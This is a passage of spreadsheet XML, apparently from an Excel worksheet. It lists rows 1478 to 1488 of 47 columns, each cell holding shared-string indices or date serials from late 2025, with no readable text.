        <v>8415</v>
      </c>
      <c r="E1478" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1478" s="23" t="s">
        <v>10897</v>
      </c>
      <c r="G1478" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1478" s="23"/>
      <c r="I1478" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1478" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1478" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1478" s="24">
        <v>45987.3756712963</v>
      </c>
      <c r="M1478" s="24">
        <v>45987.3756712963</v>
      </c>
      <c r="N1478" s="23" t="s">
        <v>8405</v>
      </c>
      <c r="O1478" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1478" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1478" s="23"/>
      <c r="R1478" s="23" t="s">
        <v>10772</v>
      </c>
      <c r="S1478" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1478" s="23"/>
      <c r="U1478" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1478" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1478" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1478" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1478" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1478" s="24">
        <v>45987.3760416667</v>
      </c>
      <c r="AA1478" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1478" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1478" s="23"/>
      <c r="AD1478" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1478" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1478" s="23"/>
      <c r="AG1478" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1478" s="24">
        <v>45987.3760648148</v>
      </c>
      <c r="AI1478" s="23"/>
      <c r="AJ1478" s="23"/>
      <c r="AK1478" s="23"/>
      <c r="AL1478" s="23"/>
      <c r="AM1478" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1478" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1478" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1478" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1478" s="24">
        <v>45987.396875</v>
      </c>
      <c r="AR1478" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1478" s="23"/>
      <c r="AT1478" s="23"/>
      <c r="AU1478" s="23"/>
    </row>
    <row r="1479" s="1" customFormat="1" spans="1:47">
      <c r="A1479" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1479" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1479" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1479" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1479" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1479" s="23" t="s">
        <v>10898</v>
      </c>
      <c r="G1479" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1479" s="23"/>
      <c r="I1479" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1479" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1479" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1479" s="24">
        <v>45986.3709722222</v>
      </c>
      <c r="M1479" s="24">
        <v>45987.3665509259</v>
      </c>
      <c r="N1479" s="23" t="s">
        <v>8805</v>
      </c>
      <c r="O1479" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1479" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1479" s="23"/>
      <c r="R1479" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1479" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1479" s="23"/>
      <c r="U1479" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1479" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1479" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1479" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1479" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1479" s="24">
        <v>45986.3713773148</v>
      </c>
      <c r="AA1479" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1479" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1479" s="23"/>
      <c r="AD1479" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1479" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1479" s="23"/>
      <c r="AG1479" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1479" s="24">
        <v>45986.371400463</v>
      </c>
      <c r="AI1479" s="23"/>
      <c r="AJ1479" s="23"/>
      <c r="AK1479" s="23"/>
      <c r="AL1479" s="23"/>
      <c r="AM1479" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1479" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1479" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1479" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1479" s="24">
        <v>45986.3922106481</v>
      </c>
      <c r="AR1479" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1479" s="23"/>
      <c r="AT1479" s="23"/>
      <c r="AU1479" s="23"/>
    </row>
    <row r="1480" s="1" customFormat="1" spans="1:47">
      <c r="A1480" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1480" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1480" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1480" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1480" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1480" s="23" t="s">
        <v>10899</v>
      </c>
      <c r="G1480" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1480" s="23"/>
      <c r="I1480" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1480" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1480" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1480" s="24">
        <v>45986.6353240741</v>
      </c>
      <c r="M1480" s="24">
        <v>45986.6353240741</v>
      </c>
      <c r="N1480" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1480" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1480" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1480" s="23"/>
      <c r="R1480" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1480" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1480" s="23"/>
      <c r="U1480" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1480" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1480" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1480" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1480" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1480" s="24">
        <v>45986.6359143518</v>
      </c>
      <c r="AA1480" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1480" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1480" s="23"/>
      <c r="AD1480" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1480" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1480" s="23"/>
      <c r="AG1480" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1480" s="24">
        <v>45986.6359375</v>
      </c>
      <c r="AI1480" s="23"/>
      <c r="AJ1480" s="23"/>
      <c r="AK1480" s="23"/>
      <c r="AL1480" s="23"/>
      <c r="AM1480" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1480" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1480" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1480" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1480" s="24">
        <v>45986.6567476852</v>
      </c>
      <c r="AR1480" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1480" s="23"/>
      <c r="AT1480" s="23"/>
      <c r="AU1480" s="23"/>
    </row>
    <row r="1481" s="1" customFormat="1" spans="1:47">
      <c r="A1481" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1481" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1481" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1481" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1481" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1481" s="23" t="s">
        <v>10900</v>
      </c>
      <c r="G1481" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1481" s="23"/>
      <c r="I1481" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1481" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1481" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1481" s="24">
        <v>45986.6331712963</v>
      </c>
      <c r="M1481" s="24">
        <v>45986.6331712963</v>
      </c>
      <c r="N1481" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1481" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1481" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1481" s="23"/>
      <c r="R1481" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1481" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1481" s="23"/>
      <c r="U1481" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1481" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1481" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1481" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1481" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1481" s="24">
        <v>45986.6338657407</v>
      </c>
      <c r="AA1481" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1481" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1481" s="23"/>
      <c r="AD1481" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1481" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1481" s="23"/>
      <c r="AG1481" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1481" s="24">
        <v>45986.6338888889</v>
      </c>
      <c r="AI1481" s="23"/>
      <c r="AJ1481" s="23"/>
      <c r="AK1481" s="23"/>
      <c r="AL1481" s="23"/>
      <c r="AM1481" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1481" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1481" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1481" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1481" s="24">
        <v>45986.6546990741</v>
      </c>
      <c r="AR1481" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1481" s="23"/>
      <c r="AT1481" s="23"/>
      <c r="AU1481" s="23"/>
    </row>
    <row r="1482" s="1" customFormat="1" spans="1:47">
      <c r="A1482" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1482" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1482" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1482" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1482" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1482" s="23" t="s">
        <v>10901</v>
      </c>
      <c r="G1482" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1482" s="23"/>
      <c r="I1482" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1482" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1482" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1482" s="24">
        <v>45985.3862615741</v>
      </c>
      <c r="M1482" s="24">
        <v>45986.3841087963</v>
      </c>
      <c r="N1482" s="23" t="s">
        <v>8712</v>
      </c>
      <c r="O1482" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1482" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1482" s="23"/>
      <c r="R1482" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1482" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1482" s="23"/>
      <c r="U1482" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1482" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1482" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1482" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1482" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1482" s="24">
        <v>45985.3864699074</v>
      </c>
      <c r="AA1482" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1482" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1482" s="23"/>
      <c r="AD1482" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1482" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1482" s="23"/>
      <c r="AG1482" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1482" s="24">
        <v>45985.3864930556</v>
      </c>
      <c r="AI1482" s="23"/>
      <c r="AJ1482" s="23"/>
      <c r="AK1482" s="23"/>
      <c r="AL1482" s="23"/>
      <c r="AM1482" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1482" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1482" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1482" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1482" s="24">
        <v>45985.4073032407</v>
      </c>
      <c r="AR1482" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1482" s="23"/>
      <c r="AT1482" s="23"/>
      <c r="AU1482" s="23"/>
    </row>
    <row r="1483" s="1" customFormat="1" spans="1:47">
      <c r="A1483" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1483" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1483" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1483" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1483" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1483" s="23" t="s">
        <v>10902</v>
      </c>
      <c r="G1483" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1483" s="23"/>
      <c r="I1483" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1483" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1483" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1483" s="24">
        <v>45986.3817361111</v>
      </c>
      <c r="M1483" s="24">
        <v>45986.3817361111</v>
      </c>
      <c r="N1483" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1483" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1483" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1483" s="23"/>
      <c r="R1483" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1483" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1483" s="23"/>
      <c r="U1483" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1483" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1483" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1483" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1483" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1483" s="24">
        <v>45986.3826157407</v>
      </c>
      <c r="AA1483" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1483" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1483" s="23"/>
      <c r="AD1483" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1483" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1483" s="23"/>
      <c r="AG1483" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1483" s="24">
        <v>45986.3827662037</v>
      </c>
      <c r="AI1483" s="23"/>
      <c r="AJ1483" s="23"/>
      <c r="AK1483" s="23"/>
      <c r="AL1483" s="23"/>
      <c r="AM1483" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1483" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1483" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1483" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1483" s="24">
        <v>45986.4034490741</v>
      </c>
      <c r="AR1483" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1483" s="23"/>
      <c r="AT1483" s="23"/>
      <c r="AU1483" s="23"/>
    </row>
    <row r="1484" s="1" customFormat="1" spans="1:47">
      <c r="A1484" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1484" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1484" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1484" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1484" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1484" s="23" t="s">
        <v>10903</v>
      </c>
      <c r="G1484" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1484" s="23"/>
      <c r="I1484" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1484" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1484" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1484" s="24">
        <v>45986.3089236111</v>
      </c>
      <c r="M1484" s="24">
        <v>45986.3089236111</v>
      </c>
      <c r="N1484" s="23" t="s">
        <v>8805</v>
      </c>
      <c r="O1484" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1484" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1484" s="23"/>
      <c r="R1484" s="23" t="s">
        <v>1698</v>
      </c>
      <c r="S1484" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1484" s="23"/>
      <c r="U1484" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1484" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1484" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1484" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1484" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1484" s="24">
        <v>45986.3098148148</v>
      </c>
      <c r="AA1484" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1484" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1484" s="23"/>
      <c r="AD1484" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1484" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1484" s="23"/>
      <c r="AG1484" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1484" s="24">
        <v>45986.309837963</v>
      </c>
      <c r="AI1484" s="23"/>
      <c r="AJ1484" s="23"/>
      <c r="AK1484" s="23"/>
      <c r="AL1484" s="23"/>
      <c r="AM1484" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1484" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1484" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1484" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1484" s="24">
        <v>45986.3306481481</v>
      </c>
      <c r="AR1484" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1484" s="23"/>
      <c r="AT1484" s="23"/>
      <c r="AU1484" s="23"/>
    </row>
    <row r="1485" s="1" customFormat="1" spans="1:47">
      <c r="A1485" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1485" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1485" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1485" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1485" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1485" s="23" t="s">
        <v>10904</v>
      </c>
      <c r="G1485" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1485" s="23"/>
      <c r="I1485" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1485" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1485" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1485" s="24">
        <v>45985.6946875</v>
      </c>
      <c r="M1485" s="24">
        <v>45985.6946875</v>
      </c>
      <c r="N1485" s="23" t="s">
        <v>8712</v>
      </c>
      <c r="O1485" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1485" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1485" s="23"/>
      <c r="R1485" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1485" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1485" s="23"/>
      <c r="U1485" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1485" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1485" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1485" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1485" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1485" s="24">
        <v>45985.6956134259</v>
      </c>
      <c r="AA1485" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1485" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1485" s="23"/>
      <c r="AD1485" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1485" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1485" s="23"/>
      <c r="AG1485" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1485" s="24">
        <v>45985.6956597222</v>
      </c>
      <c r="AI1485" s="23"/>
      <c r="AJ1485" s="23"/>
      <c r="AK1485" s="23"/>
      <c r="AL1485" s="23"/>
      <c r="AM1485" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1485" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1485" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1485" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1485" s="24">
        <v>45985.7164467593</v>
      </c>
      <c r="AR1485" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1485" s="23"/>
      <c r="AT1485" s="23"/>
      <c r="AU1485" s="23"/>
    </row>
    <row r="1486" s="1" customFormat="1" spans="1:47">
      <c r="A1486" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1486" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1486" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1486" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1486" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1486" s="23" t="s">
        <v>10905</v>
      </c>
      <c r="G1486" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1486" s="23"/>
      <c r="I1486" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1486" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1486" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1486" s="24">
        <v>45985.3933101852</v>
      </c>
      <c r="M1486" s="24">
        <v>45985.643900463</v>
      </c>
      <c r="N1486" s="23" t="s">
        <v>8712</v>
      </c>
      <c r="O1486" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1486" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1486" s="23"/>
      <c r="R1486" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1486" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1486" s="23"/>
      <c r="U1486" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1486" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1486" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1486" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1486" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1486" s="24">
        <v>45985.3942824074</v>
      </c>
      <c r="AA1486" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1486" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1486" s="23"/>
      <c r="AD1486" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1486" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1486" s="23"/>
      <c r="AG1486" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1486" s="24">
        <v>45985.3943171296</v>
      </c>
      <c r="AI1486" s="23"/>
      <c r="AJ1486" s="23"/>
      <c r="AK1486" s="23"/>
      <c r="AL1486" s="23"/>
      <c r="AM1486" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1486" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1486" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1486" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1486" s="24">
        <v>45985.4151157407</v>
      </c>
      <c r="AR1486" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1486" s="23"/>
      <c r="AT1486" s="23"/>
      <c r="AU1486" s="23"/>
    </row>
    <row r="1487" s="1" customFormat="1" spans="1:47">
      <c r="A1487" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1487" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1487" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1487" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1487" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1487" s="23" t="s">
        <v>10906</v>
      </c>
      <c r="G1487" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1487" s="23"/>
      <c r="I1487" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1487" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1487" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1487" s="24">
        <v>45985.4181018519</v>
      </c>
      <c r="M1487" s="24">
        <v>45985.4181018519</v>
      </c>
      <c r="N1487" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1487" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1487" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1487" s="23"/>
      <c r="R1487" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1487" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1487" s="23"/>
      <c r="U1487" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1487" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1487" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1487" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1487" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1487" s="24">
        <v>45985.4187268519</v>
      </c>
      <c r="AA1487" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1487" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1487" s="23"/>
      <c r="AD1487" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1487" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1487" s="23"/>
      <c r="AG1487" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1487" s="24">
        <v>45985.4187731482</v>
      </c>
      <c r="AI1487" s="23"/>
      <c r="AJ1487" s="23"/>
      <c r="AK1487" s="23"/>
      <c r="AL1487" s="23"/>
      <c r="AM1487" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1487" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1487" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1487" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1487" s="24">
        <v>45985.4395601852</v>
      </c>
      <c r="AR1487" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1487" s="23"/>
      <c r="AT1487" s="23"/>
      <c r="AU1487" s="23"/>
    </row>
    <row r="1488" s="1" customFormat="1" spans="1:47">
      <c r="A1488" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B1488" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1488" s="23" t="s">
        <v>3453</v>
      </c>
      <c r="D1488" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E1488" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1488" s="23" t="s">
        <v>10907</v>
      </c>
      <c r="G1488" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1488" s="23"/>
      <c r="I1488" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J1488" s="23" t="s">
        <v>10908</v>
      </c>
      <c r="K1488" s="23" t="s">
        <v>10909</v>
      </c>
      <c r="L1488" s="24">
        <v>45985.3862152778</v>
      </c>
      <c r="M1488" s="24">
        <v>45985.3896759259</v>
      </c>
      <c r="N1488" s="23" t="s">
        <v>8712</v>
      </c>
      <c r="O1488" s="23" t="s">
        <v>10910</v>
      </c>
      <c r="P1488" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1488" s="23"/>
      <c r="R1488" s="23" t="s">
        <v>10911</v>
      </c>
      <c r="S1488" s="23" t="s">
        <v>3453</v>
      </c>
      <c r="T1488" s="23"/>
      <c r="U1488" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V1488" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1488" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1488" s="23" t="s">
        <v>8461</v>
      </c>
      <c r="Y1488" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1488" s="24">
        <v>45985.3865162037</v>
      </c>
      <c r="AA1488" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB1488" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1488" s="23"/>
      <c r="AD1488" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE1488" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1488" s="23"/>
      <c r="AG1488" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1488" s="24">
